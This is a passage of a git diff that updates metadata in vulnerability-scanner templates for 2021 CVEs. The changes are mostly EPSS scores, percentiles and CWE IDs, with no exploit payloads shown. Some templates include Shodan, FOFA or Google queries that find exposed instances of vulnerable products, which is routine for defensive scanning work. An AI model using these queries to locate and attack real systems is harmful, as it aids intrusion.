b/http/cves/2021/CVE-2021-3577.yaml index db4a440feb..ddee7b8022 100644 --- a/http/cves/2021/CVE-2021-3577.yaml +++ b/http/cves/2021/CVE-2021-3577.yaml @@ -13,9 +13,10 @@ info: cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2021-3577 - cwe-id: CWE-78,CWE-863 + cwe-id: CWE-863,CWE-78 epss-score: 0.97158 cpe: cpe:2.3:o:binatoneglobal:halo\+_camera_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.99701 metadata: max-request: 1 vendor: binatoneglobal diff --git a/http/cves/2021/CVE-2021-36260.yaml b/http/cves/2021/CVE-2021-36260.yaml index 960c6590f3..e1fdec2474 100644 --- a/http/cves/2021/CVE-2021-36260.yaml +++ b/http/cves/2021/CVE-2021-36260.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-36260 cwe-id: CWE-78 - epss-score: 0.97512 + epss-score: 0.97514 cpe: cpe:2.3:o:hikvision:ds-2cd2026g2-iu\/sl_firmware:-:*:*:*:*:*:*:* + epss-percentile: 0.99972 metadata: max-request: 2 shodan-query: http.favicon.hash:999357577 @@ -38,6 +39,7 @@ http: Host: {{Hostname}} req-condition: true + matchers-condition: and matchers: - type: regex diff --git a/http/cves/2021/CVE-2021-36356.yaml b/http/cves/2021/CVE-2021-36356.yaml index 2357a135dc..e294b7877e 100644 --- a/http/cves/2021/CVE-2021-36356.yaml +++ b/http/cves/2021/CVE-2021-36356.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-36356 cwe-id: CWE-434 - epss-score: 0.93231 + epss-score: 0.92269 cpe: cpe:2.3:a:kramerav:viaware:*:*:*:*:*:*:*:* + epss-percentile: 0.98579 metadata: max-request: 2 vendor: kramerav diff --git a/http/cves/2021/CVE-2021-36380.yaml b/http/cves/2021/CVE-2021-36380.yaml index b52070e15a..fbb672303c 100644 --- a/http/cves/2021/CVE-2021-36380.yaml +++ b/http/cves/2021/CVE-2021-36380.yaml @@ -14,8 +14,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-36380 cwe-id: CWE-78 - epss-score: 0.97044 + epss-score: 0.96993 cpe: cpe:2.3:a:sunhillo:sureline:*:*:*:*:*:*:*:* + epss-percentile: 0.9962 metadata: max-request: 1 vendor: sunhillo diff --git a/http/cves/2021/CVE-2021-36450.yaml b/http/cves/2021/CVE-2021-36450.yaml index a83fb4aeac..d7d706c130 100644 --- a/http/cves/2021/CVE-2021-36450.yaml +++ b/http/cves/2021/CVE-2021-36450.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00468 cpe: cpe:2.3:a:verint:workforce_optimization:15.2.8.10048:*:*:*:*:*:*:* + epss-percentile: 0.72463 metadata: max-request: 2 shodan-query: title:"Verint Sign-in" diff --git a/http/cves/2021/CVE-2021-3654.yaml b/http/cves/2021/CVE-2021-3654.yaml index abe4609ae7..cee60b719b 100644 --- a/http/cves/2021/CVE-2021-3654.yaml +++ b/http/cves/2021/CVE-2021-3654.yaml @@ -16,8 +16,9 @@ info: cvss-score: 6.1 cve-id: CVE-2021-3654 cwe-id: CWE-601 - epss-score: 0.93434 + epss-score: 0.93152 cpe: cpe:2.3:a:openstack:nova:*:*:*:*:*:*:*:* + epss-percentile: 0.98686 metadata: max-request: 1 vendor: openstack diff --git a/http/cves/2021/CVE-2021-36580.yaml b/http/cves/2021/CVE-2021-36580.yaml index bec6ff3a95..b9444c8df1 100644 --- a/http/cves/2021/CVE-2021-36580.yaml +++ b/http/cves/2021/CVE-2021-36580.yaml @@ -3,21 +3,28 @@ id: CVE-2021-36580 info: name: IceWarp Mail Server - Open Redirect author: DhiyaneshDk + severity: medium description: | IceWarp Mail Server contains an open redirect via the referer parameter. This can lead to phishing attacks or other unintended redirects. - severity: medium reference: - https://www.icewarp.com/ - https://twitter.com/shifacyclewala/status/1443298941311668227 + - http://icewarp.com + - http://mail.ziyan.com classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 - cwe-id: CWE-601 cve-id: CVE-2021-36580 + cwe-id: CWE-601 + epss-score: 0.00212 + cpe: cpe:2.3:a:icewarp:icewarp_server:*:*:*:*:*:*:*:* + epss-percentile: 0.58419 metadata: max-request: 1 verified: true shodan-query: title:"icewarp" + vendor: icewarp + product: icewarp_server tags: cve,cve2021,icewarp,redirect http: diff --git a/http/cves/2021/CVE-2021-36748.yaml b/http/cves/2021/CVE-2021-36748.yaml index 004bb8f2d6..f80440e573 100644 --- a/http/cves/2021/CVE-2021-36748.yaml +++ b/http/cves/2021/CVE-2021-36748.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-89 epss-score: 0.00805 cpe: cpe:2.3:a:prestahome:blog:*:*:*:*:*:prestashop:*:* + epss-percentile: 0.79534 metadata: max-request: 2 framework: prestashop diff --git a/http/cves/2021/CVE-2021-36749.yaml b/http/cves/2021/CVE-2021-36749.yaml index 55fb61b401..bd19cbd423 100644 --- a/http/cves/2021/CVE-2021-36749.yaml +++ b/http/cves/2021/CVE-2021-36749.yaml @@ -15,8 +15,9 @@ info: cvss-score: 6.5 cve-id: CVE-2021-36749 cwe-id: CWE-863 - epss-score: 0.95311 + epss-score: 0.94684 cpe: cpe:2.3:a:apache:druid:*:*:*:*:*:*:*:* + epss-percentile: 0.98933 metadata: max-request: 1 vendor: apache diff --git a/http/cves/2021/CVE-2021-36873.yaml b/http/cves/2021/CVE-2021-36873.yaml index 7dacbd77d0..813aeba24f 100644 --- a/http/cves/2021/CVE-2021-36873.yaml +++ b/http/cves/2021/CVE-2021-36873.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-79 epss-score: 0.00131 cpe: cpe:2.3:a:webence:iq_block_country:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.47313 metadata: max-request: 4 verified: true diff --git a/http/cves/2021/CVE-2021-37216.yaml b/http/cves/2021/CVE-2021-37216.yaml index 76c8aeef89..3da3d82629 100644 --- a/http/cves/2021/CVE-2021-37216.yaml +++ b/http/cves/2021/CVE-2021-37216.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00106 cpe: cpe:2.3:o:qsan:xn8024r_firmware:3.1.5:*:*:*:*:*:*:* + epss-percentile: 0.42468 metadata: max-request: 1 vendor: qsan diff --git a/http/cves/2021/CVE-2021-37304.yaml b/http/cves/2021/CVE-2021-37304.yaml index 97f41f47f5..3552f160d3 100644 --- a/http/cves/2021/CVE-2021-37304.yaml +++ b/http/cves/2021/CVE-2021-37304.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-732 epss-score: 0.0101 cpe: cpe:2.3:a:jeecg:jeecg:*:*:*:*:*:*:*:* + epss-percentile: 0.81823 metadata: max-request: 1 verified: true diff --git a/http/cves/2021/CVE-2021-37305.yaml b/http/cves/2021/CVE-2021-37305.yaml index 9d2b9a34e2..b9878c9d47 100644 --- a/http/cves/2021/CVE-2021-37305.yaml +++ b/http/cves/2021/CVE-2021-37305.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-732 epss-score: 0.00246 cpe: cpe:2.3:a:jeecg:jeecg:*:*:*:*:*:*:*:* + epss-percentile: 0.618 metadata: max-request: 1 verified: true diff --git a/http/cves/2021/CVE-2021-37416.yaml b/http/cves/2021/CVE-2021-37416.yaml index 388d218707..2a262a22fa 100644 --- a/http/cves/2021/CVE-2021-37416.yaml +++ b/http/cves/2021/CVE-2021-37416.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00118 cpe: cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:*:*:*:*:*:*:*:* + epss-percentile: 0.45063 metadata: max-request: 1 shodan-query: http.title:"ManageEngine" diff --git a/http/cves/2021/CVE-2021-37538.yaml b/http/cves/2021/CVE-2021-37538.yaml index c053856964..719d4c60a5 100644 --- a/http/cves/2021/CVE-2021-37538.yaml +++ b/http/cves/2021/CVE-2021-37538.yaml @@ -14,8 +14,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-37538 cwe-id: CWE-89 - epss-score: 0.02629 + epss-score: 0.02621 cpe: cpe:2.3:a:smartdatasoft:smartblog:*:*:*:*:*:prestashop:*:* + epss-percentile: 0.88974 metadata: max-request: 1 framework: prestashop diff --git a/http/cves/2021/CVE-2021-37573.yaml b/http/cves/2021/CVE-2021-37573.yaml index d31552d5b4..eec981df1a 100644 --- a/http/cves/2021/CVE-2021-37573.yaml +++ b/http/cves/2021/CVE-2021-37573.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00303 cpe: cpe:2.3:a:tiny_java_web_server_project:tiny_java_web_server:*:*:*:*:*:*:*:* + epss-percentile: 0.65782 metadata: max-request: 1 vendor: tiny_java_web_server_project diff --git a/http/cves/2021/CVE-2021-37580.yaml b/http/cves/2021/CVE-2021-37580.yaml index 20131be658..aa05d80977 100644 --- a/http/cves/2021/CVE-2021-37580.yaml +++ b/http/cves/2021/CVE-2021-37580.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-37580 cwe-id: CWE-287 - epss-score: 0.93913 + epss-score: 0.93293 cpe: cpe:2.3:a:apache:shenyu:2.3.0:*:*:*:*:*:*:* + epss-percentile: 0.98709 metadata: max-request: 1 vendor: apache diff --git a/http/cves/2021/CVE-2021-37589.yaml b/http/cves/2021/CVE-2021-37589.yaml index aeb4f39996..ee72981c2c 100644 --- a/http/cves/2021/CVE-2021-37589.yaml +++ b/http/cves/2021/CVE-2021-37589.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-89 epss-score: 0.0051 cpe: cpe:2.3:a:virtuasoftware:cobranca:*:*:*:*:*:*:*:* + epss-percentile: 0.73614 metadata: max-request: 3 shodan-query: http.favicon.hash:876876147 diff --git a/http/cves/2021/CVE-2021-37704.yaml b/http/cves/2021/CVE-2021-37704.yaml index 8e22523029..05bfadcd38 100644 --- a/http/cves/2021/CVE-2021-37704.yaml +++ b/http/cves/2021/CVE-2021-37704.yaml @@ -15,9 +15,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N cvss-score: 4.3 cve-id: CVE-2021-37704 - cwe-id: CWE-668,CWE-200 + cwe-id: CWE-200,CWE-668 epss-score: 0.00282 cpe: cpe:2.3:a:phpfastcache:phpfastcache:*:*:*:*:*:*:*:* + epss-percentile: 0.64484 metadata: max-request: 2 vendor: phpfastcache diff --git a/http/cves/2021/CVE-2021-37833.yaml b/http/cves/2021/CVE-2021-37833.yaml index 5bdcf1ec06..42076feab4 100644 --- a/http/cves/2021/CVE-2021-37833.yaml +++ b/http/cves/2021/CVE-2021-37833.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.0009 cpe: cpe:2.3:a:digitaldruid:hoteldruid:3.0.2:*:*:*:*:*:*:* + epss-percentile: 0.37259 metadata: max-request: 4 vendor: digitaldruid diff --git a/http/cves/2021/CVE-2021-38314.yaml b/http/cves/2021/CVE-2021-38314.yaml index a004e7aae0..aed5fc432e 100644 --- a/http/cves/2021/CVE-2021-38314.yaml +++ b/http/cves/2021/CVE-2021-38314.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-916,CWE-200 epss-score: 0.00153 cpe: cpe:2.3:a:redux:gutenberg_template_library_\&_redux_framework:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.50938 metadata: max-request: 2 framework: wordpress diff --git a/http/cves/2021/CVE-2021-38540.yaml b/http/cves/2021/CVE-2021-38540.yaml index d0296b6d65..8055278008 100644 --- a/http/cves/2021/CVE-2021-38540.yaml +++ b/http/cves/2021/CVE-2021-38540.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-38540 cwe-id: CWE-269,CWE-306 - epss-score: 0.00757 + epss-score: 0.006 cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* + epss-percentile: 0.75724 metadata: max-request: 2 verified: true diff --git a/http/cves/2021/CVE-2021-38647.yaml b/http/cves/2021/CVE-2021-38647.yaml index adc54225eb..7754833123 100644 --- a/http/cves/2021/CVE-2021-38647.yaml +++ b/http/cves/2021/CVE-2021-38647.yaml @@ -16,9 +16,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-38647 - cwe-id: CWE-665 - epss-score: 0.97478 + cwe-id: CWE-287 + epss-score: 0.97445 cpe: cpe:2.3:a:microsoft:azure_automation_state_configuration:-:*:*:*:*:*:*:* + epss-percentile: 0.99918 metadata: max-request: 1 vendor: microsoft diff --git a/http/cves/2021/CVE-2021-38702.yaml b/http/cves/2021/CVE-2021-38702.yaml index e5c1fc6fbb..65e460ce81 100644 --- a/http/cves/2021/CVE-2021-38702.yaml +++ b/http/cves/2021/CVE-2021-38702.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.0057 cpe: cpe:2.3:o:cyberoamworks:netgenie_c0101b1-20141120-ng11vo_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.75034 metadata: max-request: 1 vendor: cyberoamworks diff --git a/http/cves/2021/CVE-2021-38704.yaml b/http/cves/2021/CVE-2021-38704.yaml index 78d55a1e8f..77c68cb035 100644 --- a/http/cves/2021/CVE-2021-38704.yaml +++ b/http/cves/2021/CVE-2021-38704.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00141 cpe: cpe:2.3:a:cliniccases:cliniccases:7.3.3:*:*:*:*:*:*:* + epss-percentile: 0.49142 metadata: max-request: 1 shodan-query: http.title:"ClinicCases",html:"/cliniccases/" diff --git a/http/cves/2021/CVE-2021-38751.yaml b/http/cves/2021/CVE-2021-38751.yaml index cf408cd795..94191019b2 100644 --- a/http/cves/2021/CVE-2021-38751.yaml +++ b/http/cves/2021/CVE-2021-38751.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-116 epss-score: 0.00242 cpe: cpe:2.3:a:exponentcms:exponentcms:*:*:*:*:*:*:*:* + epss-percentile: 0.6141 metadata: max-request: 1 vendor: exponentcms diff --git a/http/cves/2021/CVE-2021-39141.yaml b/http/cves/2021/CVE-2021-39141.yaml index 81b7ef2235..b6029df484 100644 --- a/http/cves/2021/CVE-2021-39141.yaml +++ b/http/cves/2021/CVE-2021-39141.yaml @@ -17,8 +17,9 @@ info: cvss-score: 8.5 cve-id: CVE-2021-39141 cwe-id: CWE-434 - epss-score: 0.21811 + epss-score: 0.15968 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* + epss-percentile: 0.95247 metadata: max-request: 1 vendor: xstream_project diff --git a/http/cves/2021/CVE-2021-39144.yaml b/http/cves/2021/CVE-2021-39144.yaml index 7c2fcf0132..f81da81227 100644 --- a/http/cves/2021/CVE-2021-39144.yaml +++ b/http/cves/2021/CVE-2021-39144.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-306,CWE-502 epss-score: 0.97244 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* + epss-percentile: 0.99759 metadata: max-request: 1 vendor: xstream_project diff --git a/http/cves/2021/CVE-2021-39146.yaml b/http/cves/2021/CVE-2021-39146.yaml index cccd733990..8d669df994 100644 --- a/http/cves/2021/CVE-2021-39146.yaml +++ b/http/cves/2021/CVE-2021-39146.yaml @@ -17,8 +17,9 @@ info: cvss-score: 8.5 cve-id: CVE-2021-39146 cwe-id: CWE-434 - epss-score: 0.21054 + epss-score: 0.15366 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* + epss-percentile: 0.95168 metadata: max-request: 1 vendor: xstream_project diff --git a/http/cves/2021/CVE-2021-39152.yaml b/http/cves/2021/CVE-2021-39152.yaml index 339c95f9bc..0dd993e3b6 100644 --- a/http/cves/2021/CVE-2021-39152.yaml +++ b/http/cves/2021/CVE-2021-39152.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-502 epss-score: 0.00668 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* + epss-percentile: 0.77147 metadata: max-request: 1 vendor: xstream_project diff --git a/http/cves/2021/CVE-2021-39165.yaml b/http/cves/2021/CVE-2021-39165.yaml index 5a19370f1b..3b28f7f775 100644 --- a/http/cves/2021/CVE-2021-39165.yaml +++ b/http/cves/2021/CVE-2021-39165.yaml @@ -17,8 +17,9 @@ info: cvss-score: 6.5 cve-id: CVE-2021-39165 cwe-id: CWE-287 - epss-score: 0.026 + epss-score: 0.02927 cpe: cpe:2.3:a:chachethq:cachet:*:*:*:*:*:*:*:* + epss-percentile: 0.89509 metadata: max-request: 1 verified: true diff --git a/http/cves/2021/CVE-2021-39211.yaml b/http/cves/2021/CVE-2021-39211.yaml index c7079b5ca8..fb3cfbb7e4 100644 --- a/http/cves/2021/CVE-2021-39211.yaml +++ b/http/cves/2021/CVE-2021-39211.yaml @@ -15,8 +15,9 @@ info: cvss-score: 5.3 cve-id: CVE-2021-39211 cwe-id: CWE-668,CWE-200 - epss-score: 0.00253 + epss-score: 0.00208 cpe: cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:* + epss-percentile: 0.58059 metadata: max-request: 2 vendor: glpi-project diff --git a/http/cves/2021/CVE-2021-39226.yaml b/http/cves/2021/CVE-2021-39226.yaml index 50a49576d7..fd1ce9cba8 100644 --- a/http/cves/2021/CVE-2021-39226.yaml +++ b/http/cves/2021/CVE-2021-39226.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-287 epss-score: 0.9726 cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* + epss-percentile: 0.99768 metadata: max-request: 1 shodan-query: title:"Grafana" diff --git a/http/cves/2021/CVE-2021-39312.yaml b/http/cves/2021/CVE-2021-39312.yaml index 803d229c08..ac6141fbaa 100644 --- a/http/cves/2021/CVE-2021-39312.yaml +++ b/http/cves/2021/CVE-2021-39312.yaml @@ -16,8 +16,9 @@ info: cvss-score: 7.5 cve-id: CVE-2021-39312 cwe-id: CWE-22 - epss-score: 0.05109 + epss-score: 0.05291 cpe: cpe:2.3:a:trueranker:true_ranker:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.92075 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2021/CVE-2021-39316.yaml b/http/cves/2021/CVE-2021-39316.yaml index a27e9bc914..13bfe59f99 100644 --- a/http/cves/2021/CVE-2021-39316.yaml +++ b/http/cves/2021/CVE-2021-39316.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.42316 cpe: cpe:2.3:a:digitalzoomstudio:zoomsounds:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.96839 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2021/CVE-2021-39320.yaml b/http/cves/2021/CVE-2021-39320.yaml index 4b28903bb6..a04b846b6a 100644 --- a/http/cves/2021/CVE-2021-39320.yaml +++ b/http/cves/2021/CVE-2021-39320.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.0021 cpe: cpe:2.3:a:underconstruction_project:underconstruction:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.5823 metadata: max-request: 2 verified: true diff --git a/http/cves/2021/CVE-2021-39322.yaml b/http/cves/2021/CVE-2021-39322.yaml index 9dcb227cf1..8e106e9926 100644 --- a/http/cves/2021/CVE-2021-39322.yaml +++ b/http/cves/2021/CVE-2021-39322.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00234 cpe: cpe:2.3:a:cybernetikz:easy_social_icons:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.60774 metadata: max-request: 2 framework: wordpress diff --git a/http/cves/2021/CVE-2021-39327.yaml b/http/cves/2021/CVE-2021-39327.yaml index 39764ebbb3..e56ee445d4 100644 --- a/http/cves/2021/CVE-2021-39327.yaml +++ b/http/cves/2021/CVE-2021-39327.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-459,CWE-200 epss-score: 0.08547 cpe: cpe:2.3:a:ait-pro:bulletproof_security:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.93622 metadata: max-request: 2 framework: wordpress diff --git a/http/cves/2021/CVE-2021-39350.yaml b/http/cves/2021/CVE-2021-39350.yaml index 017e5b1a34..d26f11ac5a 100644 --- a/http/cves/2021/CVE-2021-39350.yaml +++ b/http/cves/2021/CVE-2021-39350.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00104 cpe: cpe:2.3:a:foliovision:fv_flowplayer_video_player:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.41813 metadata: max-request: 2 framework: wordpress diff --git a/http/cves/2021/CVE-2021-39433.yaml b/http/cves/2021/CVE-2021-39433.yaml index 9d0654cdfc..94762bd6c8 100644 --- a/http/cves/2021/CVE-2021-39433.yaml +++ b/http/cves/2021/CVE-2021-39433.yaml @@ -15,6 +15,7 @@ info: cve-id: CVE-2021-39433 epss-score: 0.00902 cpe: cpe:2.3:a:biqs:biqsdrive:*:*:*:*:*:*:*:* + epss-percentile: 0.80714 metadata: max-request: 1 vendor: biqs diff --git a/http/cves/2021/CVE-2021-39501.yaml b/http/cves/2021/CVE-2021-39501.yaml index eaa48af047..3b19fd1634 100644 --- a/http/cves/2021/CVE-2021-39501.yaml +++ b/http/cves/2021/CVE-2021-39501.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-601 epss-score: 0.00093 cpe: cpe:2.3:a:eyoucms:eyoucms:1.5.4:*:*:*:*:*:*:* + epss-percentile: 0.38821 metadata: max-request: 1 vendor: eyoucms diff --git a/http/cves/2021/CVE-2021-40149.yaml b/http/cves/2021/CVE-2021-40149.yaml index bc6488ee12..31c3780e16 100644 --- a/http/cves/2021/CVE-2021-40149.yaml +++ b/http/cves/2021/CVE-2021-40149.yaml @@ -16,8 +16,9 @@ info: cvss-score: 5.9 cve-id: CVE-2021-40149 cwe-id: CWE-552 - epss-score: 0.00267 + epss-score: 0.00689 cpe: cpe:2.3:o:reolink:e1_zoom_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.77586 metadata: max-request: 1 shodan-query: http.title:"Reolink" diff --git a/http/cves/2021/CVE-2021-40150.yaml b/http/cves/2021/CVE-2021-40150.yaml index 275a262e47..321bb4d8ce 100644 --- a/http/cves/2021/CVE-2021-40150.yaml +++ b/http/cves/2021/CVE-2021-40150.yaml @@ -16,8 +16,9 @@ info: cvss-score: 7.5 cve-id: CVE-2021-40150 cwe-id: CWE-552 - epss-score: 0.00536 + epss-score: 0.00892 cpe: cpe:2.3:o:reolink:e1_zoom_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.80593 metadata: max-request: 1 shodan-query: http.title:"Reolink" diff --git a/http/cves/2021/CVE-2021-40323.yaml b/http/cves/2021/CVE-2021-40323.yaml index c915d274b0..91c7127890 100644 --- a/http/cves/2021/CVE-2021-40323.yaml +++ b/http/cves/2021/CVE-2021-40323.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-40323 cwe-id: CWE-94 - epss-score: 0.01853 + epss-score: 0.01788 cpe: cpe:2.3:a:cobbler_project:cobbler:*:*:*:*:*:*:*:* + epss-percentile: 0.86537 metadata: max-request: 2 vendor: cobbler_project diff --git a/http/cves/2021/CVE-2021-40438.yaml b/http/cves/2021/CVE-2021-40438.yaml index ad1a842aeb..61d2cb3070 100644 --- a/http/cves/2021/CVE-2021-40438.yaml +++ b/http/cves/2021/CVE-2021-40438.yaml @@ -17,8 +17,9 @@ info: cvss-score: 9 cve-id: CVE-2021-40438 cwe-id: CWE-918 - epss-score: 0.97544 + epss-score: 0.97523 cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:* + epss-percentile: 0.99978 metadata: max-request: 1 vendor: apache diff --git a/http/cves/2021/CVE-2021-40539.yaml b/http/cves/2021/CVE-2021-40539.yaml index 71439498b6..3c0059a518 100644 --- a/http/cves/2021/CVE-2021-40539.yaml +++ b/http/cves/2021/CVE-2021-40539.yaml @@ -16,9 +16,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-40539 - cwe-id: CWE-287 - epss-score: 0.97472 + cwe-id: CWE-706 + epss-score: 0.97487 cpe: cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4510:*:*:*:*:*:* + epss-percentile: 0.99953 metadata: max-request: 4 vendor: zohocorp diff --git a/http/cves/2021/CVE-2021-40542.yaml b/http/cves/2021/CVE-2021-40542.yaml index b829bf007a..9122f13afb 100644 --- a/http/cves/2021/CVE-2021-40542.yaml +++ b/http/cves/2021/CVE-2021-40542.yaml @@ -14,8 +14,9 @@ info: cvss-score: 6.1 cve-id: CVE-2021-40542 cwe-id: CWE-79 - epss-score: 0.01491 + epss-score: 0.00643 cpe: cpe:2.3:a:os4ed:opensis:8.0:*:*:*:*:*:*:* + epss-percentile: 0.76616 metadata: max-request: 1 shodan-query: http.title:"openSIS" diff --git a/http/cves/2021/CVE-2021-40661.yaml b/http/cves/2021/CVE-2021-40661.yaml index 0a5bf9fe9a..d7e68e0669 100644 --- a/http/cves/2021/CVE-2021-40661.yaml +++ b/http/cves/2021/CVE-2021-40661.yaml @@ -16,8 +16,9 @@ info: cvss-score: 7.5 cve-id: CVE-2021-40661 cwe-id: CWE-22 - epss-score: 0.00843 + epss-score: 0.01112 cpe: cpe:2.3:o:mt:ind780_firmware:7.2.10:*:*:*:*:*:*:* + epss-percentile: 0.82732 metadata: max-request: 1 google-query: inurl:excalweb.dll diff --git a/http/cves/2021/CVE-2021-40822.yaml b/http/cves/2021/CVE-2021-40822.yaml index 53c05a1dc6..bfeef8d1e6 100644 --- a/http/cves/2021/CVE-2021-40822.yaml +++ b/http/cves/2021/CVE-2021-40822.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-918 epss-score: 0.6683 cpe: cpe:2.3:a:osgeo:geoserver:*:*:*:*:*:*:*:* + epss-percentile: 0.97493 metadata: max-request: 1 verified: true diff --git a/http/cves/2021/CVE-2021-40856.yaml b/http/cves/2021/CVE-2021-40856.yaml index 0f4eba8cb1..1c1b48fe58 100644 --- a/http/cves/2021/CVE-2021-40856.yaml +++ b/http/cves/2021/CVE-2021-40856.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.5 cve-id: CVE-2021-40856 cwe-id: CWE-706 - epss-score: 0.02169 + epss-score: 0.02537 cpe: cpe:2.3:o:auerswald:comfortel_3600_ip_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.88804 metadata: max-request: 1 vendor: auerswald diff --git a/http/cves/2021/CVE-2021-40859.yaml b/http/cves/2021/CVE-2021-40859.yaml index a4c9e5f951..48ea3aae68 100644 --- a/http/cves/2021/CVE-2021-40859.yaml +++ b/http/cves/2021/CVE-2021-40859.yaml @@ -16,6 +16,7 @@ info: cve-id: CVE-2021-40859 epss-score: 0.02655 cpe: cpe:2.3:o:auerswald:compact_5500r_firmware:7.8a:build002:*:*:*:*:*:* + epss-percentile: 0.89037 metadata: max-request: 1 fofa-query: '"auerswald"' diff --git a/http/cves/2021/CVE-2021-40868.yaml b/http/cves/2021/CVE-2021-40868.yaml index a0d333a560..85df285e26 100644 --- a/http/cves/2021/CVE-2021-40868.yaml +++ b/http/cves/2021/CVE-2021-40868.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.00264 cpe: cpe:2.3:a:cloudron:cloudron:6.2:*:*:*:*:*:*:* + epss-percentile: 0.63286 metadata: max-request: 1 vendor: cloudron diff --git a/http/cves/2021/CVE-2021-40870.yaml b/http/cves/2021/CVE-2021-40870.yaml index df7dc3d447..fa70f7ac7d 100644 --- a/http/cves/2021/CVE-2021-40870.yaml +++ b/http/cves/2021/CVE-2021-40870.yaml @@ -14,9 +14,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-40870 - cwe-id: CWE-436 - epss-score: 0.95922 + cwe-id: CWE-23 + epss-score: 0.95606 cpe: cpe:2.3:a:aviatrix:controller:*:*:*:*:*:*:*:* + epss-percentile: 0.99146 metadata: max-request: 2 vendor: aviatrix diff --git a/http/cves/2021/CVE-2021-40875.yaml b/http/cves/2021/CVE-2021-40875.yaml index 05647786c9..1a048fa349 100644 --- a/http/cves/2021/CVE-2021-40875.yaml +++ b/http/cves/2021/CVE-2021-40875.yaml @@ -16,8 +16,9 @@ info: cvss-score: 7.5 cve-id: CVE-2021-40875 cwe-id: CWE-425 - epss-score: 0.05046 + epss-score: 0.04429 cpe: cpe:2.3:a:gurock:testrail:*:*:*:*:*:*:*:* + epss-percentile: 0.91335 metadata: max-request: 2 shodan-query: http.html:"TestRail" diff --git a/http/cves/2021/CVE-2021-40908.yaml b/http/cves/2021/CVE-2021-40908.yaml index 631e0826fc..8303d21d4b 100644 --- a/http/cves/2021/CVE-2021-40908.yaml +++ b/http/cves/2021/CVE-2021-40908.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-40908 cwe-id: CWE-89 - epss-score: 0.00942 + epss-score: 0.01192 cpe: cpe:2.3:a:purchase_order_management_system_project:purchase_order_management_system:1.0:*:*:*:*:*:*:* + epss-percentile: 0.83381 metadata: max-request: 1 verified: "true" diff --git a/http/cves/2021/CVE-2021-40960.yaml 